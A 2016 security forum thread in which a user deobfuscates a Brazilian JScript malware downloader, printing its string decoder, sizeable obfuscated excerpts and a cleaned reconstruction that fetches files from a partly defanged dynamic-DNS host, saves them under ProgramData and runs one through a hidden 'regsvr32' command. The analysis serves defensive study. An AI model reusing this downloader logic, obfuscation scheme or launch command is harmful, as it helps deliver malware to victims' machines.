Malware Analysis Analysis of the obfuscation techniques used on Anexo_Email_Visualizar.JPG.js - 8/53

DardiM · Jul 10, 2016

From 08-07-2016-10-brazilian-malwares
https://www.hybrid-analysis.com/sam...b1d6ecf4154f32b4529b987271b?environmentId=100

8/53 on virusTotal

I dis-obfuscated this sample. It was funny as it was a kind of challenge to myself

First step, I tried to find / understand the method used.
I then analysed the main decrypter function and sub functions it calls.
=> I simplified their decrypter, and I used it to step by step decrypt all encrypted strings, and remove trash they put (I could decrypt all the encrypted strings only by calling their own VERY obfuscated decrypter function and sub functions, but this was less interesting

).

Do not hesitate to click on spoiler

(1) Main decrypter function :

This function is mainly used to decrypt string as path, files names, url used (or false data to disturb us ! ).
It calls several other functions, very obfuscated too.

I wanted to simplify all, to have a 'more easy to read' single function
This is the simplified decrypter function I made, more understandable, no ?

function NaflwigtGwlnigiLpdkqufrRgxqojrn( a_string )
{
var first_char;
var current_decoded;

current_decoded = "";

first_char_before_loop_less_65 = a_string.charCodeAt(0) - 65;

a_string = a_string.substring(1);

while (a_string.length > 0){

current_decoded = current_decoded + String.fromCharCode( (a_string.charCodeAt(0) -65 ) * 25 + ( a_string.charCodeAt(1)-65 ) - first_char_before_loop_less_65 - 10);
a_string = a_string.substring(2);
}

return current_decoded;
}

(2) Call to decrypter function :

There are a lot of calls to the decrypter function that only product unused data.

One good example is :

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFDEYFBFCFDEYFNFDFPFNFDFSDBDAFNFBFN") ;
=> "afvqhdfghdrhtrhw43rfr"

All the HafleihtskdjgkGwlnigi=HafleihtskdjgkGwlnigi("....") are fake data
(56 times) => you can remove all occurrence

There are also other fake var / content
So it makes harder to find the real important calls / var / content.

Examples with useful data :

NaflwigtGwlnigiLpdkqufrRgxqojrn("XEEECER"); => "GET"
NaflwigtGwlnigiLpdkqufrRgxqojrn("SDYDWEM"); => "GET"
NaflwigtGwlnigiLpdkqufrRgxqojrn("BDHDFDU"); => "GET"
NaflwigtGwlnigiLpdkqufrRgxqojrn("ADGDEDT"); => "GET"
=> yes, same result with different obfuscated strings (to slow dis-obfuscating ... )

Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq"); => WScript.ScriptFullName
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);

"WScript.N" + "etwork "=> WScript.CreateObject("WScript.Network");

ghetstHafleihtytqerGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEGEWFMFDFKFO");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("LFBFGEYCRDQFBFEEWEE");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("AFGFAFBELETDOEIEQELEJFB");
~~HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YFMFLFNFJFNFKGFGAGFFKFXGAGFFKFXGF");~~
sDpqgkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);

"Script" + "ing.FileS" + "ystemObject" => WScript.CreateObject("Scripting.FileSystemObject");

A lot of parts work in the same way

Another example of how obfuscated is their file :
3 different parts for the same result :

if (edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("HEJEJEOFJEW") + NaflwigtGwlnigiLpdkqufrRgxqojrn("FEPFKFK") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("HCNFAFDEU"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHCPEPEQFDEQFDENEQENFDCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("VEXEXFVGCFVFWFHFPDCGAFVFI"))){
KkxqojrkkkBxmohen("MaqkwugrDpqgkqufr");
}
}
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("JELELEQFLEY") + NaflwigtGwlnigiLpdkqufrRgxqojrn("LEVFQFQ") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("OCUFHFKFC"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHFCEOFHFCEPFDENEQFHCPCOFEEQCOCOFCEPFC") ;

if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("BEDEDFBFHFBFCEMEUCHFFFBEN"))){
KkxqojrkkkBxmohen("CgxqojrEqknugp");
}
}
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("CEEEEEJFEEREMFHFH") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("CCIEUEXEP"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFOFUDCDEFRDEDCDDFRDEFUFCFEDDDCFPFDFP") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFAFAFXGEFXFYFJFRDEGCFXFK"))){
KkxqojrkkkBxmohen("CgxqojrGwlnigi");
}
}

if (Objet_Scripting_FileSystemObject.FileExists("C:\ProgramData\UserName\auidxx60.log")){
if((WScript_ScriptFullName != "C:\ProgramData\UserName\system.wsf")){
WScript_Quit(0);
}
}

(3) Path :

NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB");
=> "C:\\ProgramData\\"

This way User_Path = "C:\ProgramData\[UserName]\" was found as main path used.

Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq");
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);
// UserName

dfDpqgkqufrregqqKkxqojr = ppjjhMaqkwugrjjhGwlnigi.UserName;
ajgMaqkwugrshdkNameGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB") + ppjjhMaqkwugrjjhGwlnigi.UserName;
// "C:\ProgramData\[UserName]"

Objet_Network = WScript.CreateObject("WScript.Network");
User_Path = "C:\ProgramData\" + Objet_Network.UserName;

=> created if not exist

if(! (sDpqgkqufr.FolderExists(ajgMaqkwugrshdkNameGwlnigi))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFPFDFFFSDDDFDEFSDFFSFSFSFVFQFP");
sDpqgkqufr.CreateFolder(ajgMaqkwugrshdkNameGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("VFTFHGAFUFWDHDIFWDJDJDIDJFT");
}

if(! (Scripting_FileSystemObject.FolderExists(User_Path))){
Scripting_FileSystemObject.CreateFolder(User_Path);
}

The most part of the files downloaded will be put there.

(4) Main log files :

log_file_r2 = Objet_Scripting_FileSystemObject.OpenTextFile("C:\ProgramData\UserName\r2.log",8,true,false);
log_file_r2.WriteLine(WScript_ScriptFullName);
log_file_r2.Close();

if((WScript_ScriptFullName != "C:\ProgramData\UserName\system.wsf"))){
log_file_auid = Objet_Scripting_FileSystemObject.OpenTextFile("C:\ProgramData\UserName\auid.log",8,true,false);
log_file_auid.WriteLine(WScript_ScriptFullName);
log_file_auid.Close();
}
log_file_auidxx60 = Objet_Scripting_FileSystemObject.OpenTextFile("C:\ProgramData\UserName\auidxx60.log",8,true,false);
log_file_auidxx60.WriteLine(WScript_ScriptFullName);
log_file_auidxx60.Close();

(5) URLs / files :

With the decrypter, by several calls, concatenation :

Loop with parameter i to construct several urls to try to download files.

i >= 0, 1 , 2
"https://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/?v=60&x1x2c=[fileID]";
(i modified something in url to security purpose !!!)
=> For each url, it try to download below files if not existing on pc
"C:\ProgramData\UserName\UserNamexmda.jpg" ( if one of below files is found, the function used to download this first file is overwritten )
"C:\ProgramData\UserName\UserNamexmdb.jpg"
"C:\ProgramData\UserName\UserNamexmdc.jpg"
"C:\ProgramData\UserName\guildwg.gif"
"C:\ProgramData\UserName\UserNamewg.gif"

Dpqgkqufrh4h4aah4Eqknugp = ajgMaqkwugrshdkNameGwlnigi+LpdkqufrsljhirueCgxqojr+dfDpqgkqufrregqqKkxqojr+IsqxeihysjjauayaqHafleiht;
//"C:\\ProgramData\\UseName" + "\\" + UserName + "xmda.jpg";
Dpqgkqufrh4h4bbh4Eqknugp = Faqhlwugtkjst4jayMaqkwugr + KkxqojrssgtsyyaqFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("IDTFFESFAFGFKEUFHFNFNFNEP");
//url from where to download the file :
"hxxps://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/?v=60&x1x2c=[fileID]";
(i modified something in url to security purpose !!!)

Eqknugpkhs1111gyKkxqojr = NaflwigtGwlnigiLpdkqufrRgxqojrn("MFBFNFNFJ");
// "http"
CgxqojrdijurngyMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("LFLDECSCSDLFLFPFCFEEWFBFAFR");
// "s://Aswjleihy"
Gwlnigisjorkrj88dqJsqgxeohy = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDMETFHFAEXESFBCIEREWEOENFBEWENFGCK");
// "Kkxqojr.infernew0"
Lpdkqufruisuishjsj88dqMaqkwugr = 200+100+55;
QxbedyqdshyFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("NCTEXFTFIEUFHFD");
// ".dynami"
DpqgkqufrnsdhteIsqxeihy = NaflwigtGwlnigiLpdkqufrRgxqojrn("JESETFEFJCPEREY");
// "cdns.bi"
BxmohenfurKkxqojr = NaflwigtGwlnigiLpdkqufrRgxqojrn("PFWCWCXDCCW");
// "z/04/"

function EqknugpjdjuhheMaqkwugr(BxmohenhjsyePlmeheiq)
{
var HafleihtdnuiehDpqgkqufr;
var LpdkqufrsdferhNaflwigt;
try
{
LpdkqufrsdferhNaflwigt = Eqknugpkhs1111gyKkxqojr+ CgxqojrdijurngyMaqkwugr + Gwlnigisjorkrj88dqJsqgxeohy + BxmohenhjsyePlmeheiq;
HafleihtdnuiehDpqgkqufr = LpdkqufrsdferhNaflwigt + QxbedyqdshyFaqhlwugt + DpqgkqufrnsdhteIsqxeihy+BxmohenfurKkxqojr;
//
}
catch (Kkxqojr)
{

}
return HafleihtdnuiehDpqgkqufr;
// "https://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/"
// with i : value from a Loop
}

try // try to download the file, and if all is ok, save it to the PC
{
if (Cgxqojrh46sDpqgkqufr(Dpqgkqufrh4h4aah4Eqknugp) < Plmeheiqneysg3Bxmohen){
MaqkwugrllaakkssdKkxqojr(Dpqgkqufrh4h4bbh4Eqknugp, Dpqgkqufrh4h4aah4Eqknugp);
}
}
catch (Kkxqojr)
{
}

(6) Method Used to download :

"WinHttp.WinHttpRequest.5.1"

MaqkwugrxxhgsreIsqxeihy = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEHFAFFDR");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("KFLFLFHCQEHFA");
~~HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFDFBFEFQFBFEFQFDFBFOFUDDDCFPFDFP") ;~~
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RFMDYFS");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("QFRFNEI");
~~HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOEXFKEUEXEWFKEUEXEUEWEXFKEUEWEXCWCVFJEWFJ") ;~~
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFGFK");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("GERFGFH");
~~HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEUFAFQFLFRDAFNEXFBEXFBFNEXFAFBCYFMFAFM") ;~~
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("LCRCY");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RCXDB");

MaqkwugrxxhgsreIsqxeihy => "WinHttp.WinHttpRequest.5.1"

"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)"

try
{
object_http = WScript.CreateObject("WinHttp.WinHttpRequest.5.1");
object_http.settimeouts(34871, 34566, 34871, 32876);
object_http.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)";
object_http.Option(4) = 13056;
object_http.Option(6) = true;
object_http.Option(12) = true;
object_http.Open("GET, url, false);
object_http.Send("");
if((object_http.Status == 200)){
try
{
Create_open_write_save_ADODB_stream(object_http.ResponseBody,file_path);
}
catch (Kkxqojr)
{
}
}

(7) Method Used to save files :

"ADODB.Stream"
option => 2 : Overwrites the file with the data from the currently open Stream object, if the file already exists

(8) cmd used

The malware end with :

file = "C:\ProgramData\UserName\UserNamewg.gif";

WScript.Sleep_(3535);
WScript.Sleep_(3535);

if (if_file_exist_return_10_else_0(file) > 2){
run_cmd(file);

function MaqkwugrjhgdteAswjleihy(Maqkwugrndsggste4asGwlnigi)
{
try
{
Eqknugphsyr66nnfCgxqojr = new ActiveXObject(NaflwigtGwlnigiLpdkqufrRgxqojrn("OELEHEXFNFEFLFPCUEHFDFAFHFH"));
Eqknugphsyr66nnfCgxqojr.run(aKkxqojrgefGwlnigiuy + Bxmohenh5tgpIsqxeihy + Maqkwugrndsggste4asGwlnigi , Eqknugpd7d7Cgxqojr, true);
~~HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFRFXDGDFFSFGFS");~~
KkxqojrkkkBxmohen("MaqkwugrGwlnigi");
}
catch (Kkxqojr)
{
}

function run_cmd(file)
{
try
{
Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);
}
catch (Kkxqojr)
{
}

Note :

WScript.sleep(3535) is used 8 times

HafleihthsdyeIsqxeihy = 3535;

function AswjleihykadfjosijfoeLpdkqufr(FaqhlwugtlkosdfjjiaGwlnigi)
{
var Faqhlwugte4ijiwyNaflwigt;
WScript.sleep(HafleihthsdyeIsqxeihy);
return Faqhlwugte4ijiwyNaflwigt;
}

Conclusion :

The person who made this method have done a relative good job, when compared with a lot of other obfuscated methods I used to see, these last months.

JM Safe · Jul 10, 2016

DardiM said:
EDITING - WORK IN PROGRESS

From 08-07-2016-10-brazilian-malwares
https://www.hybrid-analysis.com/sam...b1d6ecf4154f32b4529b987271b?environmentId=100

I dis-obfuscated this sample, was funny as it was a a challenge to myself

(1) Main decoder function :

This function is mainly used to decode string as path , files names, url used.
It call several other functions, very obfuscated too.

I simplified all to have a 'more easy to read' decoder, to be able to dis-obfuscate all the sample file.

function NaflwigtGwlnigiLpdkqufrRgxqojrn(OafwhmtdhgdfgsaaFaqhlwugt)
{
var LpdkqufrjlkhiuhfueCgxqojr;
var AswjleihylkwhfweBxmohen;
var NaflwigtxsdfserMaqkwugr;
var CgxqojrsdhuiersfEqknugp;
var Faqhlwugtsdhu11i11ersfGwlnigi;
var DpqgkqufrhsdyeHafleiht;
var EqknugprftggeLpdkqufr;
var Eqknugpd7heNaflwigt;
Faqhlwugtsdhu11i11ersfGwlnigi = "";
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
AswjleihylkwhfweBxmohen = "";
Eqknugpd7heNaflwigt = "GwlnigiNaflwigtIsqxeihy";
NaflwigtxsdfserMaqkwugr = Dpqgkqufrjhs11ksMaqkwugr;
LpdkqufrjlkhiuhfueCgxqojr = "LpdkqufrDpqgkqufrMaqkwugr";
CgxqojrsdhuiersfEqknugp = HafleihtnishyswsIsqxeihy(OafwhmtdhgdfgsaaFaqhlwugt,Dpqgkqufrjhs11ksMaqkwugr,EqknugprftggeLpdkqufr);
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
DpqgkqufrhsdyeHafleiht = "GwlnigiFaqhlwugtIsqxeihy";
OafwhmtdhgdfgsaaFaqhlwugt = EqknugpasheywsLpdkqufr(OafwhmtdhgdfgsaaFaqhlwugt,GwlnigiogijkoiytiLpdkqufr);
LpdkqufrjlkhiuhfueCgxqojr = "CgxqojrDpqgkqufrIsqxeihy";
while (OafwhmtdhgdfgsaaFaqhlwugt.length > Dpqgkqufrjhs11ksMaqkwugr){
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
Faqhlwugtsdhu11i11ersfGwlnigi = Faqhlwugtsdhu11i11ersfGwlnigi + Kkxqojrjhskisd33fEqknugp(OafwhmtdhgdfgsaaFaqhlwugt,CgxqojrsdhuiersfEqknugp,Dpqgkqufrjhs11ksMaqkwugr,"LpdkqufrAswjleihyDpqgkqufr",Eqknugpd7heNaflwigt,"GwlnigiNaflwigtJsqgxeohy");
OafwhmtdhgdfgsaaFaqhlwugt = GwlnigijppqoeuyaHafleiht(OafwhmtdhgdfgsaaFaqhlwugt,EqknugpjhgdfsdMaqkwugr,DpqgkqufrhsdyeHafleiht);
}
LpdkqufrjlkhiuhfueCgxqojr = "EqknugpDpqgkqufrOafwhmtd";
return Faqhlwugtsdhu11i11ersfGwlnigi;
}

This is the simplified decoder I make :

function NaflwigtGwlnigiLpdkqufrRgxqojrn( a_string )
{
var first_char;
var current_decoded;

current_decoded = "";

first_char_before_loop_less_65 = a_string.charCodeAt(0) - 65;

a_string = a_string.substring(1);

while (a_string.length > 0){

current_decoded = current_decoded + String.fromCharCode( (a_string.charCodeAt(0) -65 ) * 25 + ( a_string.charCodeAt(1)-65 ) - first_char_before_loop_less_65 - 10);
a_string = a_string.substring(2);
}

return current_decoded;
}

(2) Call to his function :

There are a lot of calls to the decoder function that only product unused data like :

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFDEYFBFCFDEYFNFDFPFNFDFSDBDAFNFBFN") ;
=> "afvqhdfghdrhtrhw43rfr"

So it makes harder to find the real important calls.

Example with real data :
NaflwigtGwlnigiLpdkqufrRgxqojrn("SDYDWEM"); => "GET"

(3) Path / filed / url :

This way User_Path = "C:\ProgramData\[UserName]\" was found as main path used.
=> created if not exist
The most of the file downloaded will be put there.

Main path :

If log file present but actual script running isn't system.wsf => Quit
if (Objet_Scripting_FileSystemObject.FileExists("C:\ProgramData\UserName\auidxx60.log")){
if((WScript_ScriptFullName != "C:\ProgramData\UserName\system.wsf")){
WScript_Quit(0);
}
}
Create the path :
if(! (Scripting_FileSystemObject.FolderExists(User_Path))){
Scripting_FileSystemObject.CreateFolder(User_Path);
}

Main log files :

log_file_r2 = Objet_Scripting_FileSystemObject.OpenTextFile("C:\ProgramData\UserName\r2.log",8,true,false);
log_file_r2.WriteLine(WScript_ScriptFullName);

log_file_r2.Close();

if((WScript_ScriptFullName != "C:\ProgramData\UserName\system.wsf"))){
log_file_auid = Objet_Scripting_FileSystemObject.OpenTextFile("C:\ProgramData\UserName\auid.log",8,true,false);
log_file_auid.WriteLine(WScript_ScriptFullName);

log_file_auid.Close();
}
log_file_auidxx60 = Objet_Scripting_FileSystemObject.OpenTextFile("C:\ProgramData\UserName\auidxx60.log",8,true,false);
log_file_auidxx60.WriteLine(WScript_ScriptFullName);
log_file_auidxx60.Close();

What did you use for disobfuscating the sample?

DardiM · Jul 10, 2016

My brain, step by step. I 'm currently adding info to the first post, already saved because I don't want to loose intermediate progress by error.

I will removed EDITING - WORK IN PROGRESS from the main page, when finished to write all

Logethica · Jul 10, 2016

Excellent Post @DardiM

Very Interesting read...
You put a lot of time and effort into it....Great Job

DardiM · Jul 10, 2016

Logethica said:
Excellent Post @DardiM
Very Interesting read...
You put a lot of time and effort into it....Great Job

Thank you

Was a kind of challenge

DardiM · Jul 10, 2016

First thread updated

LabZero · Jul 11, 2016

From the VT report, it seems JS/Nemucod or variant, so using bitwise XOR as an obfuscation method. As I have understood from your analysis, it primarily uses ActiveX controls as ADODB.Stream to save an executable file in the %TEMP% temporary folder, and run it.
So It seems to download a DLL file invoked using rundll32.exe via WScript.Shell Activex control.
Using ADODB.Stream, it will open the fake PDF/JPG file document. And so on...

frogboy · Jul 11, 2016

I would like to say i understood all this but it would be a lie, mostly it went straight over my head. great post @DardiM

DardiM · Jul 11, 2016

frogboy said:
I would like to say i understood all this but it would be a lie, mostly it went straight over my head. great post @DardiM

Klipsh said:
From the VT report, it seems JS/Nemucod or variant, so using bitwise XOR as an obfuscation method. As I have understood from your analysis, it primarily uses ActiveX controls as ADODB.Stream to save an executable file in the %TEMP% temporary folder, and run it.
So It seems to download a DLL file invoked using rundll32.exe via WScript.Shell Activex control.
Using ADODB.Stream, it will open the fake PDF/JPG file document. And so on...

My Thread is not an analysis from running (you can find it from the sample threads, or www.hybrid-analysis.com).
=> It's only an analysis of the obfuscated methods used on the downloader, and important parts that can be found with the main simplified decoder i made.

Downloading the sample and editing it is a good way to better understand my post. TAKE CARE IF YOU DO IT

But I will try to answer

(0) No bitwise XOR found. I dis-obfuscated this way :
- I first simplified their decrypter (that uses several sub function) to make it more clean (and dis-obfuscated). We can see that it uses char code technique from chars in the string passed as parameter.

function NaflwigtGwlnigiLpdkqufrRgxqojrn( a_string )
{
var first_char;
var current_decoded;
current_decoded = "";
first_char_before_loop_less_65 = a_string.charCodeAt(0) - 65;
a_string = a_string.substring(1);

while (a_string.length > 0){
current_decoded = current_decoded + String.fromCharCode( (a_string.charCodeAt(0) -65 ) * 25 + ( a_string.charCodeAt(1)-65 ) - first_char_before_loop_less_65 - 10);
a_string = a_string.substring(2);

}
return current_decoded;
}

- The decrypter for each NaflwigtGwlnigiLpdkqufrRgxqojrnal call => replaced step by step by real data
ex: NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB")
- replaced their variables (with strange name) by real contain (clear data or decrypted data from above decrypter). This can be seen on different spoiler parts I put on the first post.
- I removed all HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn([some useless string]);

A long sample here :

aBxmohenisxxMaqkwugr = "2";
edCgxqojrkjdi1111khsdGwlnigi = 2+2+3+2+1;
EqknugpammfreadFaqhlwugt = "60";
LpdkqufrsljhirueCgxqojr = "\\";
sdFaqhlwugtkjtirtqKkxqojr = 0;
Dpqgkqufrjhs11ksMaqkwugr = 0;
Hafleihtjhs11ksPlmeheiq = 7+3+16+4+32+3;
BxmohentryetrdEqknugp = true;
CgxqojrertydfgDpqgkqufr = false
GwlnigiogijkoiytiLpdkqufr = 5-4;
EqknugpjhgdfsdMaqkwugr = 1+1;
CgxqojrkdjgdteQxbedyq = 2+4+6+3+7+3;
KkxqojrkwerwweDpqgkqufr = 3-2;
Eqknugpd7d7Cgxqojr = 0;

Faqhlwugtkjst4jayMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("UFXFCGCFKFQ");
kjIsqxeihyatOafwhmtd = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDUENEUENELFD");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFXFTFIFNGAFKGEFLFTFNFXGEGAFLFNGAGEFT");

var ppjjhMaqkwugrjjhGwlnigi ;
var dfDpqgkqufrregqqKkxqojr ;
var ajgMaqkwugrshdkNameGwlnigi;
var ashtFaqhlwugtewaaGwlnigi;
var Eqknugpgja1111jhauNaflwigt;

Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq");
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);

dfDpqgkqufrregqqKkxqojr = ppjjhMaqkwugrjjhGwlnigi.UserName;
ajgMaqkwugrshdkNameGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB") + ppjjhMaqkwugrjjhGwlnigi.UserName;
//C:\\ProgramData\\UseName

ghetstHafleihtytqerGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEGEWFMFDFKFO");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("LFBFGEYCRDQFBFEEWEE");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("AFGFAFBELETDOEIEQELEJFB");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YFMFLFNFJFNFKGFGAGFFKFXGAGFFKFXGF");
sDpqgkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
//Scripting.FileSystemObject

edNaflwigtjy3gaFaqhlwugt = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
Cgxqojrjhhq23Eqknugp = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("HERETEUEVEREUERETEWFDFNFDEWFNFDFNFDCTCSCUCVCSCUCV");
aKkxqojrvitiLpdkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
aFaqhlwugthst33faLpdkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);

CgxqojrkjdfhsyeDpqgkqufr = 1000+KkxqojrkwerwweDpqgkqufr+32;

//"C:\ProgramData\UserName\auidxx60.log"
if (edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("HEJEJEOFJEW") + NaflwigtGwlnigiLpdkqufrRgxqojrn("FEPFKFK") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("HCNFAFDEU"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHCPEPEQFDEQFDENEQENFDCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("VEXEXFVGCFVFWFHFPDCGAFVFI"))){
KkxqojrkkkBxmohen("MaqkwugrDpqgkqufr");
}
}
//"C:\ProgramData\UserName\auidxx60.log"
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("JELELEQFLEY") + NaflwigtGwlnigiLpdkqufrRgxqojrn("LEVFQFQ") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("OCUFHFKFC"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHFCEOFHFCEPFDENEQFHCPCOFEEQCOCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("BEDEDFBFHFBFCEMEUCHFFFBEN"))){
KkxqojrkkkBxmohen("CgxqojrEqknugp");
}
}
